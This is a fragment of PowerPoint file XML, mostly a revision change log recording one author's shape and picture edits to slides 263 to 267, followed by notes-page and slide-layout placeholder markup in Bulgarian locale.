            <ac:spMk id="27" creationId="{C37E9D4B-7BFA-4D10-B666-547BAC499469}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-03T00:01:52.377" v="590"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2464368607" sldId="263"/>
            <ac:graphicFrameMk id="2" creationId="{F38A0A82-4D34-2453-9916-5F854938E0BF}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:picChg chg="mod ord">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-03T00:00:52.778" v="586" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2464368607" sldId="263"/>
            <ac:picMk id="5" creationId="{30272FE7-3D6E-87F9-FC9D-7E498942104C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod ord">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-03T00:00:22.183" v="583" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2464368607" sldId="263"/>
            <ac:picMk id="7" creationId="{46672101-5E5A-22B4-F09B-3205D9F1ADAC}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-03T00:00:22.183" v="583" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2464368607" sldId="263"/>
            <ac:cxnSpMk id="18" creationId="{8C730EAB-A532-4295-A302-FB4B90DB9F5E}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod setBg modNotesTx">
        <pc:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-03T00:02:55.228" v="595" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3984243392" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:42.666" v="363" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3984243392" sldId="264"/>
            <ac:spMk id="10" creationId="{0205D939-00C4-4F2E-9797-3170DD040D90}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:42.666" v="363" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3984243392" sldId="264"/>
            <ac:spMk id="12" creationId="{38EE4E44-1403-472B-8C01-D354CB8F5AE7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:42.666" v="363" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3984243392" sldId="264"/>
            <ac:spMk id="14" creationId="{583CCE40-4C5F-42D3-86D9-7892AD1E98E3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:42.675" v="364" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3984243392" sldId="264"/>
            <ac:spMk id="16" creationId="{2F19B711-C590-44D1-9AA8-9F143B0ED58A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:42.675" v="364" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3984243392" sldId="264"/>
            <ac:spMk id="17" creationId="{C0C79CF2-6A1C-4636-84CE-ABB2BE191D23}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:42.675" v="364" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3984243392" sldId="264"/>
            <ac:spMk id="18" creationId="{7A5D17DF-AD65-402C-A95C-F13C770C9FCD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-03T00:02:44.506" v="594"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3984243392" sldId="264"/>
            <ac:graphicFrameMk id="2" creationId="{DA9EB61C-C25B-6470-FB32-727EC971437B}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:42.675" v="364" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3984243392" sldId="264"/>
            <ac:picMk id="3" creationId="{DB6A8426-F1F6-4FC1-8EB6-1728569911C4}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:42.675" v="364" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3984243392" sldId="264"/>
            <ac:picMk id="5" creationId="{3D802A6B-83D7-9C65-1D63-BA3A9AEFFFEA}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod setBg">
        <pc:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:26:29.338" v="400" actId="5793"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3367836003" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:56.381" v="365" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3367836003" sldId="265"/>
            <ac:spMk id="2" creationId="{B407FC1E-7044-33D0-3DDD-220ECF580229}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:26:29.338" v="400" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3367836003" sldId="265"/>
            <ac:spMk id="3" creationId="{67D6B85B-9EE4-37CE-7A94-40EC10D31078}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:56.381" v="365" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3367836003" sldId="265"/>
            <ac:spMk id="8" creationId="{09588DA8-065E-4F6F-8EFD-43104AB2E0CF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:56.381" v="365" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3367836003" sldId="265"/>
            <ac:spMk id="10" creationId="{C4285719-470E-454C-AF62-8323075F1F5B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:56.381" v="365" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3367836003" sldId="265"/>
            <ac:spMk id="12" creationId="{CD9FE4EF-C4D8-49A0-B2FF-81D8DB7D8A24}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:56.381" v="365" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3367836003" sldId="265"/>
            <ac:spMk id="14" creationId="{4300840D-0A0B-4512-BACA-B439D5B9C57C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:56.381" v="365" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3367836003" sldId="265"/>
            <ac:spMk id="16" creationId="{D2B78728-A580-49A7-84F9-6EF6F583ADE0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:56.381" v="365" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3367836003" sldId="265"/>
            <ac:spMk id="18" creationId="{38FAA1A1-D861-433F-88FA-1E9D6FD31D11}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:56.381" v="365" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3367836003" sldId="265"/>
            <ac:spMk id="20" creationId="{8D71EDA1-87BF-4D5D-AB79-F346FD19278A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod setBg">
        <pc:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:26:50.610" v="403" actId="5793"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1394361477" sldId="266"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:26:39.987" v="401" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1394361477" sldId="266"/>
            <ac:spMk id="2" creationId="{84880CE8-F354-E166-F46E-FB55F778393B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:26:50.610" v="403" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1394361477" sldId="266"/>
            <ac:spMk id="3" creationId="{61DDAE86-148C-2310-16A4-9E014F8A3A17}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:26:39.987" v="401" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1394361477" sldId="266"/>
            <ac:spMk id="8" creationId="{907EF6B7-1338-4443-8C46-6A318D952DFD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:26:39.987" v="401" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1394361477" sldId="266"/>
            <ac:spMk id="10" creationId="{DAAE4CDD-124C-4DCF-9584-B6033B545DD5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:26:39.987" v="401" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1394361477" sldId="266"/>
            <ac:spMk id="12" creationId="{081E4A58-353D-44AE-B2FC-2A74E2E400F7}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord setBg">
        <pc:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:17.649" v="361" actId="26606"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1329164116" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:17.649" v="361" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1329164116" sldId="267"/>
            <ac:spMk id="2" creationId="{CC57FCF1-48D1-3491-59CF-D569761258FC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:17.640" v="360" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1329164116" sldId="267"/>
            <ac:spMk id="7" creationId="{5E7AA7E8-8006-4E1F-A566-FCF37EE6F35D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:17.649" v="361" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1329164116" sldId="267"/>
            <ac:spMk id="11" creationId="{7DB3C429-F8DA-49B9-AF84-21996FCF78B5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:17.649" v="361" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1329164116" sldId="267"/>
            <ac:spMk id="12" creationId="{8C790BE2-4E4F-4AAF-81A2-4A6F4885EBE6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:17.649" v="361" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1329164116" sldId="267"/>
            <ac:spMk id="13" creationId="{E12088DD-B1AD-40E0-8B86-1D87A2CCD9BE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:17.649" v="361" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1329164116" sldId="267"/>
            <ac:spMk id="14" creationId="{D28B54C3-B57B-472A-B96E-1FCB67093DC2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:17.649" v="361" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1329164116" sldId="267"/>
            <ac:spMk id="15" creationId="{C4C9F2B0-1044-46EB-8AEB-C3BFFDE6C2CC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:17.649" v="361" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1329164116" sldId="267"/>
            <ac:spMk id="17" creationId="{0C395952-4E26-45A2-8756-2ADFD6E53C6E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:17.649" v="361" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1329164116" sldId="267"/>
            <ac:spMk id="19" creationId="{4734BADF-9461-4621-B112-2D7BABEA7DD0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:25:17.640" v="360" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1329164116" sldId="267"/>
            <ac:cxnSpMk id="9" creationId="{56020367-4FD5-4596-8E10-C5F095CD8DBF}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-03T01:48:36.845" v="600" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="514872218"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57A62-B660-4732-AFD4-BA9A8E248C84}" type="datetimeFigureOut">
              <a:rPr lang="bg-BG" smtClean="0"/>
              <a:t>3.11.2025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4B17FE-323F-48D4-A964-D208A38832AB}" type="slidenum">
              <a:rPr lang="bg-BG" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="768188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2</a:t>
            </a:fld>
            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3003680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sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D74B17FE-323F-48D4-A964-D208A38832AB}" type="slidenum">
              <a:rPr lang="bg-BG" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1703019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4</a:t>
            </a:fld>
            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3164578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5</a:t>
            </a:fld>
            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1417435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6</a:t>
            </a:fld>
            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="981804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bg-BG" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1762377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sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>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8</a:t>
            </a:fld>
            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2082136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9</a:t>
            </a:fld>
            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30548238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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D74B17FE-323F-48D4-A964-D208A38832AB}" type="slidenum">
              <a:rPr lang="bg-BG" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3185822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26F26-66CF-2696-4674-DB8E7B059B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bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58E0EE92-EA98-5084-BA78-409F8ED099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bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57BC2F04-2B29-6719-80C8-D7B44AFA500E}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86F99AAE-5426-7BE8-F2A3-868AEF114FA7}"/>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5C568E2A-96D9-8612-6885-A947E63D6322}"/>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385871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6FB56-2EF2-4E80-DB32-97B12BA88FDE}"/>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6DFF303A-FDC5-6CF6-7C37-385C926720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C949BE54-EF87-BB40-BEFB-D03881AC2E7D}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA9C7DDF-76C0-41A9-528C-ED7B1499A1B8}"/>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A7ECB10E-BCBB-51B8-2BFB-044DE6D5ACBA}"/>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61756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1345-EF46-5082-9BBF-AE375ED390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bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A720B84-7D23-C94C-5F08-DF9080ABDC1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482825-8B49-9221-6882-9D01117AF2D1}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD4880D4-2247-7B94-6CF6-5FF49C8E275A}"/>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BD8D0227-4CEF-DE12-7B22-D16CF5DB7FEF}"/>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3946194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C49-59B8-F1C2-223A-4F65FA899EE3}"/>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E4163392-7C81-B751-8226-F529DB6F1F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Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77F6DE63-B2CF-20AE-4DDB-F0D10C3124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Date Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D07FC5C4-D319-4EC2-DAFF-B39A2482841C}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32FE59D8-5D15-7586-5EAE-C100DEB1363B}"/>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A7A09AC7-C754-44D5-6D4F-F0EC2AA3B927}"/>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4182762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C4AA4-EBAF-3F92-60BE-F4C38D008FC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
